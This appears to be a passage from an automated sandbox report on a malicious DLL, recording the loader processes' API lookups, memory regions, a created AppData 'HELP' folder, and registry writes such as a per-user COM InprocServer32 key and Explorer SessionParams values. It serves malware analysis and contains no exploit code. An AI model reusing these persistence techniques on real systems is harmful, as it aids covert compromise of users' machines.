| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98811 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #65: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #65 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="iexplore.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd98 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x00497fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x005a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x011affff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0129ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = iexplore.exe, size = 26, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:29 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98873 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #66: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #66 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="%Temp%\IXP000.TMP\" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:36, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda4 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0013ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x004b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x005d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd5000 | 0x7ffd5000 | 0x7ffd5fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
